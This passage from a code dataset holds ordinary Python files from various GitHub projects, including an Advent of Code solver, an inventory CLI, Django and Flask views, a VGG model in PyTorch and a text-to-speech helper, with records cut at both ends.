21 24 30","repo_name":"kachrya/CodingYoga","sub_path":"PythonProjects/MaxSubArrayEqualK.py","file_name":"MaxSubArrayEqualK.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"34236947625","text":"import base64\nimport io\nimport json\nimport subprocess\nimport sys\n\ntry:\n _, project, aur_pkgname, aur_pkgname_git, version, use_git = sys.argv\nexcept ValueError:\n sys.stderr.write(\"Usage: ./aurvm_client.py $PROJECT $AUR_PKGANME $AUR_PKGNAME_GIT $version use_git[true|false]\\n\")\n sys.exit(1)\n\nuse_git = True if use_git == 'true' else False\nif use_git:\n gitver = subprocess.check_output(r\"git describe --long | sed -E 's/([^-]*-g)/r\\1/;s/-/./g;s/^v//g'\", shell=True)\n gitver = gitver.decode('utf-8').strip()\nelse:\n gitver = None\n\nwith io.open('PKGBUILD', 'r', encoding='utf-8') as fh:\n pkgbuild = fh.read()\n\ndata = json.dumps({\n 'project': project,\n 'aur_pkgname': aur_pkgname,\n 'aur_pkgname_git': aur_pkgname_git,\n 'version': version,\n 'use_git': use_git,\n 'gitver': gitver,\n 'pkgbuild': pkgbuild,\n '_api': '2'\n}, ensure_ascii=True, sort_keys=True).encode('utf-8')\n\nprint(base64.b64encode(data).decode('utf-8'))\n","repo_name":"Kwpolska/python-project-template","sub_path":"{{cookiecutter.repo_name}}/pypt-extras/AUR/AURvm/aurvm_client.py","file_name":"aurvm_client.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":170,"dataset":"github-code","pt":"85"} +{"seq_id":"30424327238","text":"#!/usr/bin/python3\n#\n# Advent of Code 2019\n# Day 2 : 1202 Program Alarm\n# \n# Author : 
Charlie Rose\n# Language : Python3\n# Date : 12/4/2019\n\nif __name__ == \"__main__\":\n f = open(\"day2input.txt\")\n\n # read the file and prep it for parsing\n init_program = f.readlines()[0].split(\",\")\n for i in range(0, len(init_program)):\n init_program[i] = int(init_program[i])\n\n \n for noun in range(0, 99):\n for verb in range(0,99):\n\n # Prep program for runnning\n program = []\n for i in init_program:\n program.append(i)\n\n program[1] = noun\n program[2] = verb\n i = 0\n\n # run program with inputs\n while i < len(program):\n # Opcode 1 : Add\n if program[i] == 1:\n operand1 = program[i + 1]\n operand2 = program[i + 2]\n dest = program[i + 3]\n \n program[dest] = program[operand1] + program[operand2]\n \n i += 4\n\n # Opcode 2 : Multiply\n if program[i] == 2:\n operand1 = program[i + 1]\n operand2 = program[i + 2]\n dest = program[i + 3]\n \n program[dest] = program[operand1] * program[operand2]\n \n i += 4\n\n # Opcode 99 : Halt\n if program[i] == 99:\n if program[0] == 19690720:\n print(\"Noun : \" + str(noun) + \", Verb : \" + str(verb) + \", Output : \" + str(program[0]))\n \n break\n\n\n f.close()\n","repo_name":"charlieroses/AdventOfCode","sub_path":"2019/02/day2p2.py","file_name":"day2p2.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"12841664021","text":"import datetime\nimport csv\nimport os\nfrom collections import OrderedDict\n\nfrom peewee import *\n\ndb = SqliteDatabase('inventory.db')\n\n\nclass Product(Model):\n product_id = AutoField(primary_key=True)\n product_name = CharField(max_length=100, unique=True)\n product_quantity = IntegerField(default=0)\n product_price = IntegerField(default=0)\n date_updated = DateField(default=datetime.datetime.now)\n\n class Meta:\n database = db\n\n\ndef initialize():\n \"\"\"Create the database and tables if they don't exist.\"\"\"\n db.connect()\n db.create_tables([Product], safe=True)\n clean_data()\n\n\ndef clear():\n \"\"\"Clear screen\"\"\"\n os.system('cls' if os.name == 'nt' else 'clear')\n\n\ndef clean_data():\n \"\"\"Clean data\"\"\"\n with open('inventory.csv', newline='') as csvfile:\n inventory_reader = csv.DictReader(csvfile, delimiter=',')\n rows = list(inventory_reader)\n for row in rows:\n row['product_name'] = row['product_name']\n row['product_price'] = (row['product_price']\n .strip('$').replace('.', ''))\n row['product_price'] = int(row['product_price'])\n row['product_quantity'] = int(row['product_quantity'])\n row['date_updated'] = datetime.datetime.strptime(\n row['date_updated'], \"%m/%d/%Y\").date()\n\n try:\n Product.create(product_name=row['product_name'],\n product_price=row['product_price'],\n product_quantity=row['product_quantity'],\n date_updated=row['date_updated'])\n except IntegrityError:\n product_record = Product.get(product_name=row['product_name'])\n if product_record.date_updated < row['date_updated']:\n product_record.product_price = (row['product_price'])\n product_record.product_quantity = row['product_quantity']\n product_record.date_updated = row['date_updated']\n product_record.save()\n\n\ndef menu_loop():\n \"\"\"Show menu\"\"\"\n choice = None\n clear()\n while True:\n print('=' * 6 + ' Menu ' + '=' * 6 + '\\n\\n')\n print(\"Enter 'q' to quit\\n\\nSelect an option from menu:\")\n\n for key, value in menu.items():\n print(\"{}) {}\".format(key, value.__doc__))\n try:\n choice = input('Action: ').lower().strip()\n if choice not in menu and choice != 'q':\n raise 
ValueError('Enter an option from menu')\n except ValueError as err:\n print(f'Invalid input {err}')\n else:\n if choice in menu:\n clear()\n menu[choice]()\n\n if choice == 'q':\n print('\\n\\n' + '=' * 14 + \"\\nSee you later!\\n\" + '=' * 14)\n break\n\n\ndef add_product():\n \"\"\"Add a product\"\"\"\n while True:\n try:\n prod_name = input(\"Enter product name: \")\n clear()\n prod_price = input(\"Enter product price in the form of\"\n \"(example: $1:50): \").strip('$').replace('.', '')\n if len(prod_price) < 3:\n prod_price = prod_price + '00'\n prod_price = int(prod_price)\n clear()\n prod_quantity = int(\n input(\"Enter product quantity in digits(example: 123): \"))\n date_added = datetime.datetime.now().date()\n except ValueError:\n print(\"You must enter required details as shown in example.\")\n else:\n if prod_name and prod_price and prod_quantity:\n confirm = input(\"Save product? [Y/N]: \").lower().strip()\n clear()\n if confirm == 'y':\n try:\n Product.create(product_name=prod_name,\n product_price=prod_price,\n product_quantity=prod_quantity,\n date_updated=date_added)\n except IntegrityError:\n existing_product = Product.select().where(Product.product_name == prod_name)\n existing_date = existing_product.get().date_updated\n if existing_date <= date_added:\n Product.update(product_name=prod_name,\n product_price=prod_price,\n product_quantity=prod_quantity,\n date_updated=date_added).where(\n Product.product_name == prod_name).execute()\n print(\"Existing product price updated\")\n else:\n break\n break\n\n\ndef delete_product(product):\n \"\"\"Delete a product\"\"\"\n if input(\"Are you sure you want to delete this product? [Y/N] \").lower() == 'y':\n product.delete_instance()\n print(\"product deleted\")\n\n\ndef view_product():\n \"\"\"View a product\"\"\"\n while True:\n try:\n inv = Product.select()\n len_inv = inv.count()\n search_id = input(f\"Enter Product id between 1 & {len_inv}:> \")\n if search_id == 'q':\n break\n search_id = int(search_id)\n product = Product.get(Product.product_id == search_id)\n if search_id not in Product.product_id:\n raise DoesNotExist\n except DoesNotExist:\n print('This product id not in inventory list, Try again')\n except ValueError:\n print('This product id not in inventory list, Try again(Use digits only)')\n else:\n clear()\n print(f'Product id: {product.product_id}')\n print(f'Product: {product.product_name}')\n print(f'Price: ${\"{:.2f}\".format(product.product_price / 100)}')\n print(f'Quantity: {product.product_quantity}')\n print(f'Date updated: {product.date_updated}')\n print('\\n\\nPress Enter To pick another product')\n print('d) Delete product')\n print('q) Return to main menu')\n\n next_action = input('Action: [Enter/d/q]').lower().strip()\n clear()\n if next_action == 'q':\n break\n elif next_action == 'd':\n delete_product(product)\n\n\ndef backup_inventory():\n \"\"\"Backup inventory\"\"\"\n with open('backup.csv', 'a') as csvfile:\n fieldnames = ['product_id', 'product_name', 'product_price',\n 'product_quantity', 'date_updated']\n productwriter = csv.DictWriter(csvfile, fieldnames=fieldnames)\n\n productwriter.writeheader()\n prod_lst = Product.select().order_by(Product.product_id.asc())\n for produ in prod_lst:\n productwriter.writerow({\n 'product_id': produ.product_id,\n 'product_name': produ.product_name,\n 'product_price': produ.product_price,\n 'product_quantity': produ.product_quantity,\n 'date_updated': produ.date_updated,\n })\n print(\"backup.csv was created successfully!\")\n\n\nmenu = OrderedDict([\n 
('v', view_product),\n ('a', add_product),\n ('b', backup_inventory),\n])\n\nif __name__ == '__main__':\n initialize()\n menu_loop()\n","repo_name":"AmmarCode/TechDegree-Project4-StoreInventory","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"34353330404","text":"import json\nimport classes\nimport pandas as pd\nimport arff\n\n\nclass JSONParser:\n appropriateConstructor = {\n 'area': classes.Area,\n 'time': classes.Time,\n 'labeled': classes.Labeled,\n 'interval': classes.Interval,\n 'sum_interval': classes.SumInterval,\n 'difference_interval': classes.TimeInterval,\n }\n\n def __init__(self, jsonFileName):\n jsonFile = open(jsonFileName)\n self.json = json.load(jsonFile)\n jsonFile.close()\n\n def generateArff(self, deviceID, start, end):\n dataFrame = self.generateDataFrame(deviceID, start, end)\n headers = list(dataFrame.columns.values)\n out = open('out.arff', 'w')\n out.write(\"@RELATION aware\\n\\n\")\n for header in headers:\n labels = \",\".join(pd.unique(dataFrame[header].values)).replace(' ', '_')\n out.write(\"@ATTRIBUTE \" + header + \" {\" + labels + \"} %string\\n\")\n out.write(\"\\n@DATA\\n\")\n for row in dataFrame.values:\n out.write(\",\".join(row).replace(' ', '_'))\n out.write(\"\\n\")\n out.close()\n \n def generateDataFrame(self, deviceID, start, end):\n dataFrames = []\n for categoryName, category in self.json.items():\n for entry in category['entries']:\n type = entry['type']\n if type == 'time':\n time = self.appropriateConstructor[type](entry)\n continue\n else:\n jsonObject = self.appropriateConstructor[type](entry)\n data = jsonObject.getLabeledData(deviceID, start, end)\n dataFrames.append(data)\n result = pd.concat(dataFrames, axis = 1).ffill().bfill()\n result.index = pd.to_datetime(result.index, unit = 'ms')\n timeLabeled = time.labelData(result.index.hour)\n result['time'] = pd.Series(timeLabeled, result.index)\n return result\n","repo_name":"sbdzdz/db2arff","sub_path":"src/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"15947511124","text":"from typing import TYPE_CHECKING, Any\n\nfrom django.apps import apps # type: ignore\nfrom django.contrib.messages.views import SuccessMessageMixin # type: ignore\nfrom django.db.models import Q # type: ignore\nfrom django.views.generic import DetailView, TemplateView, View # type: ignore\n\nfrom ..contents.choices import Contexts\nfrom ..dateofbirths.forms import DateOfBirthFormOptional\nfrom ..dateofbirths.models import DateOfBirth\nfrom ..ethnicitys.forms import EthnicityForm\nfrom ..ethnicitys.models import Ethnicity\nfrom ..genders.forms import GenderFormOptional\nfrom ..genders.models import Gender\nfrom ..labs.forms import Hlab5801Form\nfrom ..labs.models import Hlab5801\nfrom ..medhistorys.choices import MedHistoryTypes\nfrom ..medhistorys.forms import (\n AllopurinolhypersensitivityForm,\n AnginaForm,\n CadForm,\n ChfForm,\n CkdForm,\n FebuxostathypersensitivityForm,\n HeartattackForm,\n OrgantransplantForm,\n PvdForm,\n StrokeForm,\n XoiinteractionForm,\n)\nfrom ..medhistorys.models import (\n Allopurinolhypersensitivity,\n Angina,\n Cad,\n Chf,\n Ckd,\n Febuxostathypersensitivity,\n Heartattack,\n Organtransplant,\n Pvd,\n Stroke,\n Xoiinteraction,\n)\nfrom ..treatments.choices import UltChoices\nfrom ..utils.views import 
MedHistorysModelCreateView, MedHistorysModelUpdateView\nfrom .forms import UltAidForm\nfrom .models import UltAid\nfrom .selectors import ultaid_userless_qs\n\nif TYPE_CHECKING:\n from django.db.models import QuerySet # type: ignore\n\n\nclass UltAidAbout(TemplateView):\n \"\"\"About page for gout flare prophylaxis and PpxAids.\"\"\"\n\n template_name = \"ultaids/about.html\"\n\n def get_context_data(self, **kwargs: Any) -> dict[str, Any]:\n context = super().get_context_data(**kwargs)\n context.update({\"content\": self.content})\n return context\n\n @property\n def content(self):\n return apps.get_model(\"contents.Content\").objects.get(slug=\"about\", context=Contexts.ULTAID, tag=None)\n\n\nclass UltAidBase(View):\n class Meta:\n abstract = True\n\n model = UltAid\n form_class = UltAidForm\n # Assign onetoones dict with key as the name of the model and value as a\n # dict of the model's form and model.\n onetoones = {\n \"dateofbirth\": {\"form\": DateOfBirthFormOptional, \"model\": DateOfBirth},\n \"ethnicity\": {\"form\": EthnicityForm, \"model\": Ethnicity},\n \"gender\": {\"form\": GenderFormOptional, \"model\": Gender},\n \"hlab5801\": {\"form\": Hlab5801Form, \"model\": Hlab5801},\n }\n # Assign medallergys as the Treatment choices for UltAid\n medallergys = UltChoices\n # Assign medhistorys dict with key as the name of the model and value as a\n # dict of the model's form and model.\n medhistorys = {\n MedHistoryTypes.ALLOPURINOLHYPERSENSITIVITY: {\n \"form\": AllopurinolhypersensitivityForm,\n \"model\": Allopurinolhypersensitivity,\n },\n MedHistoryTypes.ANGINA: {\"form\": AnginaForm, \"model\": Angina},\n MedHistoryTypes.CAD: {\"form\": CadForm, \"model\": Cad},\n MedHistoryTypes.CHF: {\"form\": ChfForm, \"model\": Chf},\n MedHistoryTypes.CKD: {\"form\": CkdForm, \"model\": Ckd},\n MedHistoryTypes.FEBUXOSTATHYPERSENSITIVITY: {\n \"form\": FebuxostathypersensitivityForm,\n \"model\": Febuxostathypersensitivity,\n },\n MedHistoryTypes.HEARTATTACK: {\"form\": HeartattackForm, \"model\": Heartattack},\n MedHistoryTypes.ORGANTRANSPLANT: {\"form\": OrgantransplantForm, \"model\": Organtransplant},\n MedHistoryTypes.PVD: {\"form\": PvdForm, \"model\": Pvd},\n MedHistoryTypes.STROKE: {\"form\": StrokeForm, \"model\": Stroke},\n MedHistoryTypes.XOIINTERACTION: {\"form\": XoiinteractionForm, \"model\": Xoiinteraction},\n }\n # Set ckdetail to True so that parent model will include processing for CkdDetail and BaselineCreatinine\n medhistory_details = [MedHistoryTypes.CKD]\n\n\nclass UltAidCreate(UltAidBase, MedHistorysModelCreateView, SuccessMessageMixin):\n \"\"\"\n Create a new UltAid instance.\n \"\"\"\n\n def post(self, request, *args, **kwargs):\n (\n errors,\n form,\n _, # object_data\n _, # onetoone_forms\n _, # medallergys_forms\n _, # medhistorys_forms\n _, # medhistorydetails_forms\n _, # labs_formset\n onetoones_to_save,\n medallergys_to_add,\n medhistorys_to_add,\n medhistorydetails_to_add,\n labs_to_add,\n ) = super().post(request, *args, **kwargs)\n if errors:\n return errors\n else:\n return self.form_valid(\n form=form, # type: ignore\n medallergys_to_add=medallergys_to_add,\n onetoones_to_save=onetoones_to_save,\n medhistorydetails_to_add=medhistorydetails_to_add,\n medhistorys_to_add=medhistorys_to_add,\n labs_to_add=labs_to_add,\n )\n\n\nclass UltAidDetail(DetailView):\n \"\"\"DetailView for UltAid model.\"\"\"\n\n model = UltAid\n object: UltAid\n\n def get_context_data(self, **kwargs: Any) -> dict[str, Any]:\n context = super().get_context_data(**kwargs)\n for 
content in self.contents:\n context.update({content.slug: {content.tag: content}}) # type: ignore\n return context\n\n def get_queryset(self) -> \"QuerySet[Any]\":\n return ultaid_userless_qs(self.kwargs[\"pk\"])\n\n def get_object(self, *args, **kwargs) -> UltAid:\n ultaid: UltAid = super().get_object(*args, **kwargs) # type: ignore\n # Prefetch goalurate medhistory_qs for use in the template and to avoid additional queries\n if hasattr(ultaid, \"goalurate\"):\n ultaid.goalurate.medhistorys_qs = ultaid.goalurate.medhistorys.all()\n if not self.request.GET.get(\"goalurate_updated\", None):\n ultaid.goalurate.update(qs=ultaid.goalurate)\n # Check if UltAid is up to date and update if not update\n if not self.request.GET.get(\"updated\", None):\n ultaid.update(qs=ultaid)\n return ultaid\n\n @property\n def contents(self):\n return apps.get_model(\"contents.Content\").objects.filter(Q(tag__isnull=False), context=Contexts.ULTAID)\n\n\nclass UltAidUpdate(UltAidBase, MedHistorysModelUpdateView, SuccessMessageMixin):\n \"\"\"Updates a UltAid\"\"\"\n\n def get_queryset(self):\n return ultaid_userless_qs(self.kwargs[\"pk\"])\n\n def post(self, request, *args, **kwargs):\n (\n errors,\n form,\n _, # object_data\n _, # onetoone_forms\n _, # medhistorys_forms\n _, # medhistorydetails_forms\n _, # medallergys_forms\n _, # labs_formset\n medallergys_to_add,\n medallergys_to_remove,\n onetoones_to_delete,\n onetoones_to_save,\n medhistorydetails_to_add,\n medhistorydetails_to_remove,\n medhistorys_to_add,\n medhistorys_to_remove,\n labs_to_add,\n labs_to_remove,\n labs_to_update,\n ) = super().post(request, *args, **kwargs)\n if errors:\n return errors\n else:\n return self.form_valid(\n form=form, # type: ignore\n medallergys_to_add=medallergys_to_add,\n medallergys_to_remove=medallergys_to_remove,\n onetoones_to_delete=onetoones_to_delete,\n onetoones_to_save=onetoones_to_save,\n medhistorydetails_to_add=medhistorydetails_to_add,\n medhistorydetails_to_remove=medhistorydetails_to_remove,\n medhistorys_to_add=medhistorys_to_add,\n medhistorys_to_remove=medhistorys_to_remove,\n labs_to_add=labs_to_add,\n labs_to_remove=labs_to_remove,\n labs_to_update=labs_to_update,\n )\n","repo_name":"Spiewart/gouthelper","sub_path":"gouthelper/ultaids/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"5253730923","text":"# Written by Student 1 Yutong Cheng\nfrom flask import session, redirect, url_for, render_template, request, make_response, flash\nfrom . 
import bp_chatapp\nfrom .forms import LoginForm\nfrom flask_login import current_user\nfrom app.models import Project, Team, Userstory, User, TeamUserLink\n\n@bp_chatapp.route('/room', methods=['GET', 'POST'])\ndef room():\n \"\"\"Login form to enter a room.\"\"\"\n if current_user.is_authenticated:\n team_form = LoginForm(request.form)\n\n name = current_user.name\n user_id = current_user.user_id\n team = TeamUserLink.query.join(Team).with_entities(Team.name)\\\n .filter(TeamUserLink.user_id.contains(user_id)).all()\n team_list = [(i.name,i.name)for i in team]\n team_list = list(set(team_list))\n team_list.append(('Public','Public'))\n team_form.team.choices = team_list\n if request.method == 'POST':\n session['Your name'] = name\n session['Team'] = team_form.team.data\n return redirect(url_for('.chat'))\n else:\n response = make_response(redirect(url_for('auth.login')))\n flash('Please Login First To Use The Chat Function')\n return response\n return render_template('chat_index.html', team_form=team_form)\n\n\n@bp_chatapp.route('/chat')\ndef chat():\n \"\"\"Chat room. The user's name and room must be stored in\n the session.\"\"\"\n name = session.get('Your name', '')\n team = session.get('Team', '')\n if name == '' or room == '':\n return redirect(url_for('.index'))\n return render_template('chat.html', name=name, team=team)\n","repo_name":"carlchengyt/Group6_WebApp","sub_path":"app/chatapp/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"9976824858","text":"import os\nimport re\n\ndef rename_file(filename):\n \"\"\"\n Renames a given filename by reordering its parts and making specific replacements.\n \n Args:\n filename (str): The original filename.\n \n Returns:\n str: The renamed filename.\n \"\"\"\n # Extract the file extension\n base_name, file_extension = os.path.splitext(filename)\n \n # Define the regex pattern to capture different parts of the filename\n pattern = re.compile(r'^(CT_)(.*?)_(C-[A-Z0-9]+)_(.*)$')\n match = pattern.search(base_name)\n \n # If the pattern matches, construct the renamed filename based on the matched groups\n if match:\n renamed_base = f\"{match.group(1)}{match.group(3)}_{match.group(2)}_{match.group(4)}\"\n if not renamed_base.endswith('_mid'):\n renamed_base += '_mid'\n return f\"{renamed_base}{file_extension}\"\n \n # If the pattern doesn't match, return the original filename\n return filename\n\n# Test the refactored function once again\nrename_file(test_filename)\n","repo_name":"Claudron/stimme-back","sub_path":"rename_file.py","file_name":"rename_file.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"86474840765","text":"number_1 = int(input('Введите число до которого нужно сделать таблицу: '))\r\nif number_1 <= 10:\r\n print('Считай сам!')\r\nelse:\r\n for table in range(1, number_1 + 1):\r\n for n in range(1, 11):\r\n answer = table * n\r\n print(answer, end='\\t')\r\n\r\n print('\\n')\r\n\r\n print('Две минуты. 
Готово!')\r\n\r\n","repo_name":"SulaevTamerlan/Tamada-study","sub_path":"first-project.py","file_name":"first-project.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"73432810838","text":"#:: find the longest sub sequence in an array given\ndef LIS(array):\n lenghtOfArray = len(array) #lenght og the array\n lisCalculator = [1]*lenghtOfArray #initialize the a claculator to 1\n longestSubSequence = 0\n\n for i in range(1, lenghtOfArray): # for each variable in the array\n for j in range(i): #find the lenght longest sub sequence by comparison\n if array[i] > array[j] and lisCalculator[i] < lisCalculator[j] + 1:\n lisCalculator[i] = lisCalculator[j] + 1\n\n for i in range(lenghtOfArray):\n if longestSubSequence < lisCalculator[i]:\n longestSubSequence = lisCalculator[i]\n return longestSubSequence\n\n\na = [10, 22, 9, 33, 21, 50, 41, 60]\nprint(LIS(a))\n","repo_name":"ifegunni/dynamic-programming","sub_path":"longest subSequence.py","file_name":"longest subSequence.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"11170310607","text":"from typing import cast, Dict, List, Union\n\nimport torch\nfrom torch import Tensor\nfrom torch import nn\n\n__all__ = [\n \"VGG\",\n \"vgg11\", \"vgg13\", \"vgg16\", \"vgg19\",\n \"vgg11_bn\", \"vgg13_bn\", \"vgg16_bn\", \"vgg19_bn\",\n]\n\nvgg_cfgs: Dict[str, List[Union[str, int]]] = {\n \"vgg11\": [64, \"M\", 128, \"M\", 256, 256, \"M\", 512, 512, \"M\", 512, 512, \"M\"],\n \"vgg13\": [64, 64, \"M\", 128, 128, \"M\", 256, 256, \"M\", 512, 512, \"M\", 512, 512, \"M\"],\n \"vgg16\": [64, 64, \"M\", 128, 128, \"M\", 256, 256, 256, \"M\", 512, 512, 512, \"M\", 512, 512, 512, \"M\"],\n \"vgg19\": [64, 64, \"M\", 128, 128, \"M\", 256, 256, 256, 256, \"M\", 512, 512, 512, 512, \"M\", 512, 512, 512, 512, \"M\"],\n}\n\n\ndef _make_layers(vgg_cfg: List[Union[str, int]], batch_norm: bool = False) -> nn.Sequential:\n layers: nn.Sequential[nn.Module] = nn.Sequential()\n in_channels = 3\n for v in vgg_cfg:\n if v == \"M\":\n layers.append(nn.MaxPool2d((2, 2), (2, 2)))\n else:\n v = cast(int, v)\n conv2d = nn.Conv2d(in_channels, v, (3, 3), (1, 1), (1, 1))\n if batch_norm:\n layers.append(conv2d)\n layers.append(nn.BatchNorm2d(v))\n layers.append(nn.ReLU(True))\n else:\n layers.append(conv2d)\n layers.append(nn.ReLU(True))\n in_channels = v\n\n return layers\n\n\nclass VGG(nn.Module):\n def __init__(self, vgg_cfg: List[Union[str, int]], batch_norm: bool = False, num_classes: int = 1000) -> None:\n super(VGG, self).__init__()\n self.features = _make_layers(vgg_cfg, batch_norm)\n\n self.avgpool = nn.AdaptiveAvgPool2d((7, 7))\n\n self.classifier = nn.Sequential(\n nn.Linear(512 * 7 * 7, 4096),\n nn.ReLU(True),\n nn.Dropout(0.5),\n nn.Linear(4096, 4096),\n nn.ReLU(True),\n nn.Dropout(0.5),\n nn.Linear(4096, num_classes),\n )\n\n # Initialize neural network weights\n self._initialize_weights()\n\n def forward(self, x: Tensor) -> Tensor:\n return self._forward_impl(x)\n\n # Support torch.script function\n def _forward_impl(self, x: Tensor) -> Tensor:\n out = self.features(x)\n out = self.avgpool(out)\n out = torch.flatten(out, 1)\n out = self.classifier(out)\n\n return out\n\n def _initialize_weights(self) -> None:\n for module in self.modules():\n if isinstance(module, nn.Conv2d):\n nn.init.kaiming_normal_(module.weight, mode=\"fan_out\", nonlinearity=\"relu\")\n if 
module.bias is not None:\n nn.init.constant_(module.bias, 0)\n elif isinstance(module, nn.BatchNorm2d):\n nn.init.constant_(module.weight, 1)\n nn.init.constant_(module.bias, 0)\n elif isinstance(module, nn.Linear):\n nn.init.normal_(module.weight, 0, 0.01)\n nn.init.constant_(module.bias, 0)\n\n\ndef vgg11(**kwargs) -> VGG:\n model = VGG(vgg_cfgs[\"vgg11\"], False, **kwargs)\n\n return model\n\n\ndef vgg13(**kwargs) -> VGG:\n model = VGG(vgg_cfgs[\"vgg13\"], False, **kwargs)\n\n return model\n\n\ndef vgg16(**kwargs) -> VGG:\n model = VGG(vgg_cfgs[\"vgg16\"], False, **kwargs)\n\n return model\n\n\ndef vgg19(**kwargs) -> VGG:\n model = VGG(vgg_cfgs[\"vgg19\"], False, **kwargs)\n\n return model\n\n\ndef vgg11_bn(**kwargs) -> VGG:\n model = VGG(vgg_cfgs[\"vgg11\"], True, **kwargs)\n\n return model\n\n\ndef vgg13_bn(**kwargs) -> VGG:\n model = VGG(vgg_cfgs[\"vgg13\"], True, **kwargs)\n\n return model\n\n\ndef vgg16_bn(**kwargs) -> VGG:\n model = VGG(vgg_cfgs[\"vgg16\"], True, **kwargs)\n\n return model\n\n\ndef vgg19_bn(**kwargs) -> VGG:\n model = VGG(vgg_cfgs[\"vgg19\"], True, **kwargs)\n\n return model\n","repo_name":"Lornatang/VGG-PyTorch","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"85"} +{"seq_id":"36063656610","text":"from MDRSREID.Networks.RESIDUAL_NETWORK.RESNET.resnet import get_resnet\n\n# There are the function name, not the variable.\nbackbone_factory = {\n 'resnet18': get_resnet,\n 'resnet34': get_resnet,\n 'resnet50': get_resnet,\n 'resnet101': get_resnet,\n 'resnet152': get_resnet,\n}\n\n\ndef create_backbone(cfg):\n \"\"\"\n Use factory mode to create the backbone.\n The backbone is ResNet.\n\n :return: model = get_resnet(cfg)\n \"\"\"\n return backbone_factory[cfg.model.backbone.name](cfg)\n\n\nif __name__ == '__main__':\n from MDRSREID.Trainer.pre_initialization.init_config import init_config\n import torch\n\n print(\"[PYTORCH VERSION]:\", torch.__version__)\n cfg = init_config()\n print(\"ResNet Name:{}\\n\".format(cfg.model.backbone.name))\n create_backbone(cfg)\n","repo_name":"nickhuang1996/HJL-re-id","sub_path":"MDRSREID/Networks/create_backbone.py","file_name":"create_backbone.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"85"} +{"seq_id":"8205497613","text":"import torch\r\n\r\n\r\nclass Mypara:\r\n def __init__(self):\r\n pass\r\n\r\n\r\nmypara = Mypara()\r\nmypara.device = torch.device(\"cuda:0\")\r\nmypara.batch_size_train = 8\r\nmypara.batch_size_eval = 10\r\nmypara.num_epochs = 40\r\nmypara.TFnum_epochs = 20\r\nmypara.TFlr = 1.5e-5\r\nmypara.early_stopping = True\r\nmypara.patience = 4\r\nmypara.warmup = 2000\r\n\r\n# data related\r\nmypara.adr_pretr = (\r\n \"./data/up150_tauxy/CMIP6_separate_model_up150m_tauxy_Nor_kb.nc\"\r\n)\r\nmypara.interval = 4\r\nmypara.TraindataProportion = 0.9\r\nmypara.all_group = 13000\r\nmypara.adr_eval = (\r\n \"./data/up150_tauxy/SODA_ORAS_group_temp_tauxy_before1979_kb.nc\"\r\n)\r\nmypara.needtauxy = True\r\nmypara.input_channal = 7 # n_lev of 3D temperature\r\nmypara.output_channal = 7\r\nmypara.input_length = 12\r\nmypara.output_length = 20\r\nmypara.lev_range = (1, 8)\r\nmypara.lon_range = (45, 165)\r\nmypara.lat_range = (0, 51)\r\n# nino34 region\r\nmypara.lon_nino_relative = (49, 75)\r\nmypara.lat_nino_relative = (15, 36)\r\n# patch size\r\nmypara.patch_size = (3, 4)\r\nmypara.H0 = 
int((mypara.lat_range[1] - mypara.lat_range[0]) / mypara.patch_size[0])\r\nmypara.W0 = int((mypara.lon_range[1] - mypara.lon_range[0]) / mypara.patch_size[1])\r\nmypara.emb_spatial_size = mypara.H0 * mypara.W0\r\n\r\n# model\r\nmypara.model_savepath = \"./model/\"\r\nmypara.seeds = 1\r\nmypara.d_size = 256\r\nmypara.nheads = 4\r\nmypara.dim_feedforward = 512\r\nmypara.dropout = 0.2\r\nmypara.num_encoder_layers = 4\r\nmypara.num_decoder_layers = 4\r\n","repo_name":"zhoulu327/Code_of_3D-Geoformer","sub_path":"Code/myconfig.py","file_name":"myconfig.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"85"} +{"seq_id":"21015793997","text":"import os\nimport hashlib\nimport urllib\nimport requests\nimport platform\nimport time\n\nclass peladophobian(object):\n def __init__(self):\n pass\n\n def mlgsay(self, text):\n return mlgsay(text)\n\ndef mlgsay(text, play=True):\n payload = u\"451mp3\" + text\n phash = hashlib.md5(payload.encode(\"utf-8\")).hexdigest()\n url = u\"http://cache-a.oddcast.com/c_fs/{0}.mp3?engine=4&language=1&voice=5&text={1}&useUTF8=1\".format(phash, text)\n if not os.path.exists(phash+\".mp3\"):\n r = requests.get(url, stream=True)\n with open(phash + \".mp3\", \"wb\") as f:\n for chunk in r.iter_content(chunk_size=2048):\n if chunk:\n f.write(chunk)\n f.flush()\n if play:\n os.system(\"ffplay mlg.mp3 -autoexit -fs -showmode 1\")\n return phash + \".mp3\"\n\nif __name__ == \"__main__\":\n while True:\n try:\n text = None\n if sys.version_info[0] > 2:\n text = input(\">>\")\n else:\n text = raw_input(\">>\")\n mlgsay(text)\n except KeyboardInterrupt:\n 